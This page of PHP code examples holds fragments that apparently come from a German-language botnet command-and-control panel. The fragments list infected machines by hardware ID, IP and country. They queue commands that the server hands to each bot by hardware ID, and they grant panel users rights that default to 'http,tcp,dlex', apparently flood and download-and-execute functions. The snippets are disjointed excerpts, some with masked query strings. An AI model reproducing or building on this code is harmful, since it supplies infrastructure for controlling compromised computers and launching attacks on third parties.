Exemplo n.º 1
0
function get_top20($limit){
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots");
				
while($row = mysql_fetch_array($query1)){
	$alle = $row[count];
}

if($limit){
	$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 0,10");
}else{
	$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10,20");
}

$array = array();

while($row = mysql_fetch_array($query2)){
	$country = safe_xss($row['country']);
	$query3  = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '".safe_sql($country)."'");
													
	while($row = mysql_fetch_array($query3)){
		$zahl = safe_xss($row['count']);
								
		array_push($array,$zahl);

		$gesamt = $alle;
		$total  = safe_xss($zahl/$gesamt*100);
							
		if(!empty($country)){
			$countries .= '<label style="display: inline-block; width: 2em;"><img src="../img/flags/'.safe_xss($country).'.gif" OnClick="add(\''.safe_xss($country).',\');" /></label>';
		}
	}
};

return $countries;
}
Exemplo n.º 2
0
	  
//Delete
if(isset($_GET['cmd'])){
	$cmd = safe_xss($_GET['cmd']);

	mysql_query("DELETE FROM tasks WHERE command = '".safe_sql($cmd)."'");
	mysql_query("DELETE FROM tasks_done WHERE command = '".safe_sql($cmd)."'");
	
	echo '<meta http-equiv="refresh" content="0; URL=befehle.php">'; 
}	

if(isset($_GET['deletetasks'])){
	if(safe_xss($_GET['del']) == '1'){
		$query = mysql_query("SELECT id FROM tasks WHERE bots = done");
		while($row = mysql_fetch_array($query)){
		  $id = safe_xss($row['id']);
		  $result1 = mysql_query("DELETE FROM tasks WHERE id = '".safe_sql($id)."'");
		  $result2 = mysql_query("DELETE FROM tasks_done WHERE id = '".safe_sql($id)."'");
		}
		
		if(!$result1 || !$result2){
			die('<script>alert("Fehler - Kein Task beendet?");</script>
			  <meta http-equiv="refresh" content="0; URL=befehle.php">');
		}else{
			echo '<script>alert("Erfolgreich entfernt");</script>
			  <meta http-equiv="refresh" content="0; URL=befehle.php">';
		}
	}
	
	if($_GET['del'] == '2'){
		$result1 = mysql_query("DELETE FROM tasks");
Exemplo n.º 3
0
while($row = mysql_fetch_array($query1)){
  $hwid	 = safe_xss($row['hwid']);
  $status = safe_xss($row['status']);
	  
echo '<tr>
	  <td style="">'.safe_xss($row['id']).'</td>';
		if(empty($row['country'])){
			echo '<td style=""><img src="img/flags/00.gif" /></td>';
		}else{
			echo '<td style=""><img src="img/flags/'.safe_xss($row['country']).'.gif" />&nbsp;'.$options[strtoupper(safe_xss($row['country']))].'</td>';
		}
					
echo  '
	   <td style="">'.safe_xss($row['pc']).'@'.safe_xss($row['hwid']).'@'.safe_xss($row['ip']).'</td>
	   <td style="">'.safe_xss($row['install']).'</td>
	   <td style="">'.safe_xss($row['time']).'</td>';
	
if($status == '1'){
	echo '<td style="color: green;">Online</td>';
}else{
	echo '<td style="color: red;">Offline</td>';
}

}
	  
echo '</table><br /><div style="float: right; font-size: 11px;">'.$nav->createPageBar().'</div><br />';  

$query = "UPDATE bots SET status = 0 WHERE DATE_SUB('$time_now', INTERVAL ".$seconds." SECOND) > time";
    mysql_query($query) OR die(mysql_error());
	
require_once('inc/footer.php'); ?>
Exemplo n.º 4
0
<?php 
	session_start();
	require_once('inc/config.php');
	require_once('other/safe.php');
	
	if($_SESSION['seclogin']) { header('Location: index.php'); exit(); }

	if(isset($_POST['login'])){
		$user = $_POST['user'];
		$pass = sha1(md5(safe_xss($_POST['pass'])));
		
		$exist = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");
		
		if(mysql_num_rows($exist)){
			$_SESSION['seclogin'] = true;
			$_SESSION['secuser'] = $user;
			
			$q = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");
			while($row = mysql_fetch_array($q))
			{
			  if($row['admin'] == '1'){
				$_SESSION['admin'] = true;
			  }
			}
			
			$error = '<img src="img/accept.png" />&nbsp;Bitte warten...<meta http-equiv="refresh" content="3; URL=index.php">';
		}else{
			$error = '<img src="img/del.png" />&nbsp;Fehlgeschlagen';
		}
	}
?>
Exemplo n.º 5
0
<style type="text/css">
	body{
		font-size: 11px;
		font-family: Tahoma;
	}
	
	label{
		display: inline-block;
		width: 14em;
	}
</style>

<?php
require_once('../inc/config.php');
	require_once('../other/safe.php');
	require_once('../other/code2country.php');
	
	$id = safe_xss($_GET['id']);
	
	$query1 = mysql_query("SELECT * FROM tasks WHERE id = '".safe_sql($id)."'");
	while($row = mysql_fetch_array($query1))
	{
		 $split = explode(',', safe_xss($row['countries']));
		  
	
		for($i = 0; $i <= count($split)-2; $i++){
			echo '<img src="../img/flags/'.$split[$i].'.gif" />&nbsp;'.$options[strtoupper($split[$i])].'<br />';
		}

	}
?>
Exemplo n.º 6
0
									  
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE install LIKE '%$today%'");
						
while($row = mysql_fetch_array($query1)){
	$alle = safe_xss($row[count]);
}
					
$query2 = mysql_query("SELECT * FROM bots WHERE install LIKE '%$today%' GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10");					
$array = array();
	
while($row = mysql_fetch_array($query2)){
$country = safe_xss($row['country']);
$query3  = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '$country' AND install LIKE '%$today%'");
															
while($row = mysql_fetch_array($query3)){
	$zahl 	= safe_xss($row['count']);								
	array_push($array,$zahl);

	$gesamt = $alle;
	$total  = safe_xss($zahl/$gesamt*100);

	if($country == ''){
		echo '<tr><td><img src="img/flags/00.gif" /></td><td>'.safe_xss($zahl).'</td><td>'.safe_xss(round($total, 1))."%</td></tr>";
	}else{
		echo '<tr><td><img src="img/flags/'.safe_xss($country).'.gif" /></td><td>'.safe_xss($zahl). '</td><td>'.safe_xss(round($total, 1)).'%</td></tr>';
	}
}
}

echo '</table>';
?>
Exemplo n.º 7
0
<?php
if(!$_SESSION['admin']){
	echo 'Keine Berechtigung!';
	exit();
}

if(isset($_POST['adduser'])){
	if($_POST['token'] !== $_SESSION['token3']){
		echo 'Token falsch';
		exit();
	}else{
		$user_add = safe_xss($_POST['user']);
		$pass_add = safe_xss(sha1(md5($_POST['pass'])));
		$rechte_add = safe_xss($_POST['rechte']);
		$admin_add = safe_xss($_POST['admin']);

		mysql_query("INSERT INTO users (user, pw, rechte, admin) VALUES ('".safe_sql($user_add)."', '".safe_sql($pass_add)."', '".safe_sql($rechte_add)."', '".safe_sql($admin_add)."')");
		
		echo 'Bitte warten... <meta http-equiv="refresh" content="2; URL=benutzer.php">';
	}
}else{
	$_SESSION['token3'] = uniqid(md5(microtime()), true);
	?>
	<form action="adduser.php" method="post">
	  <b>Benutzer</b><p><input type="text" name="user" /></p>
	  <b>Passwort</b><p><input type="pass" name="pass" /></p>
	  <b>Rechte</b><p><input type="text" name="rechte" value="z.B http,tcp,dlex" /></p>
	  <input type="hidden" name="token" value="<?php echo $_SESSION['token3']; ?>" />
	  
	  <br />
Exemplo n.º 8
0
        $time_out = safe_xss($row['time']);
 
        //$date_old = new DateTime($time_out);
        //$date_new = $date_old->getTimestamp();    
 
        $date_old = date_create($row['time']); 
        $date_new = date_timestamp_get($date_old);
 
        if($date_new <= $time){        
            $command = $row['command'];
           
                $q2 = mysql_query("SELECT * FROM tasks WHERE command = '".safe_sql($command)."'");
                    while($row = mysql_fetch_array($q2))
                     {
                        $done = safe_xss($row['done']);
                        $bots = safe_xss($row['bots']);
                        $add  = $done+1;
                     }
                     
                    if($done != $bots){
                        $q3    = "SELECT * FROM tasks_done WHERE hwid = '".safe_sql($hwid)."' AND command = '".safe_sql($command)."'";
                        $count = mysql_query($q3);
               
                        if(!mysql_num_rows($count)){                                
                            echo '$'.$command.'$';
                           
                            mysql_query("UPDATE tasks Set done = '$add' WHERE command = '".safe_sql($command)."'");            
                            mysql_query("INSERT INTO tasks_done
                                     (hwid, command) VALUES
                                     ('".safe_sql($hwid)."', '".safe_sql($command)."')");
                        }
Exemplo n.º 9
0
		<input type="hidden" name="token" value="'.$_SESSION['token2'].'" />
		<input type="hidden" name="id" value="'.safe_xss($id).'" />
		<p><b>Zum &auml;ndern entweder <b>1</b> (F&uuml;r Admin Rechte) oder 0 (F&uuml;r User) schreiben bei Gruppe</b></p>
	   </form>';
}else{
	$_SESSION['token'] = uniqid(md5(microtime()), true);

	$query1 = mysql_query("SELECT * FROM users");
	while($row = mysql_fetch_array($query1))
	{
	  echo '<tr>
			  <td>'.admin($row['admin']).'</td>
			  <td>'.safe_xss($row['user']).'</td>
			  <td>'.safe_xss($row['rechte']).'</td>
			  <td><a href="benutzer.php?delid='.safe_xss($row['id']).'&token='.$_SESSION['token'].'" onClick="javascript:return(confirm(\'Benutzer wirklich entfernen?\'))"><img src="img/del.png" /></a></td>
			  <td><a href="benutzer.php?editid='.safe_xss($row['id']).'"><img src="img/edit.png" /></a></td>
			</tr>';
	}
	
	echo '<img src="img/add.png" />&nbsp;<a href="adduser.php" style="color: black; text-decoration: none;">Benutzer hinzuf&uuml;gen</a>';
}

function admin($a){
if($a == '1'){
	return 'Admin';
}else{
	return 'User';
}
}
?>
</table>